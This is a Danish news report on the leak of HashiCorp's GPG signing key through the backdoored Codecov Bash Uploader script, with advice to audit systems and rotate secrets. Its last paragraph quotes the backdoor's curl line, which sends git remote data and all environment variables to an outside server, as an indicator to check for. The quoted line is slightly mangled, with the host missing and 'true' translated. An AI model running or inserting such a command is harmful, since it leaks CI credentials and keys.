HashiCorp, kendt for at udvikle open source-værktøjerne Vagrant, Packer, Nomad og Terraform, annoncerede lækagen af den private GPG-nøgle, der bruges til at skabe digitale signaturer, der bekræfter udgivelser. Angribere, der fik adgang til GPG-nøglen, kunne potentielt foretage skjulte ændringer af HashiCorp-produkter ved at verificere dem med en korrekt digital signatur. Selskabet oplyste samtidig, at der under revisionen ikke blev identificeret spor af forsøg på sådanne ændringer.
I øjeblikket er den kompromitterede GPG-nøgle blevet tilbagekaldt, og en ny nøgle er blevet introduceret i stedet for. Problemet påvirkede kun verifikation ved hjælp af SHA256SUM- og SHA256SUM.sig-filerne og påvirkede ikke genereringen af digitale signaturer til Linux DEB- og RPM-pakker leveret gennem releases.hashicorp.com samt mekanismer til udgivelsesbekræftelse til macOS og Windows (AuthentiCode) .
Lækagen opstod på grund af brugen af Codecov Bash Uploader (codecov-bash) scriptet i infrastrukturen, designet til at downloade dækningsrapporter fra kontinuerlige integrationssystemer. Under angrebet på Codecov-virksomheden blev der gemt en bagdør i det angivne script, hvorigennem adgangskoder og krypteringsnøgler blev sendt til angribernes server.
For at hacke udnyttede angriberne en fejl i processen med at oprette Codecov Docker-billedet, som gjorde det muligt for dem at udtrække adgangsdata til GCS (Google Cloud Storage), der var nødvendige for at foretage ændringer i Bash Uploader-scriptet distribueret fra codecov.io internet side. Ændringerne blev foretaget tilbage den 31. januar, forblev uopdaget i to måneder og gjorde det muligt for angribere at udtrække information, der var gemt i kundemiljøer med kontinuerlige integrationssystem. Ved at bruge den tilføjede ondsindede kode kunne angribere få information om det testede Git-lager og alle miljøvariabler, inklusive tokens, krypteringsnøgler og adgangskoder, der sendes til kontinuerlige integrationssystemer for at organisere adgang til applikationskode, lagre og tjenester såsom Amazon Web Services og GitHub.
Ud over det direkte opkald blev Codecov Bash Uploader-scriptet brugt som en del af andre uploadere, såsom Codecov-action (Github), Codecov-circleci-orb og Codecov-bitrise-step, hvis brugere også er berørt af problemet. Alle brugere af codecov-bash og relaterede produkter anbefales at auditere deres infrastrukturer samt ændre adgangskoder og krypteringsnøgler. Du kan kontrollere tilstedeværelsen af en bagdør i et script ved tilstedeværelsen af linjen curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /upload/v2 || rigtigt
Kilde: opennet.ru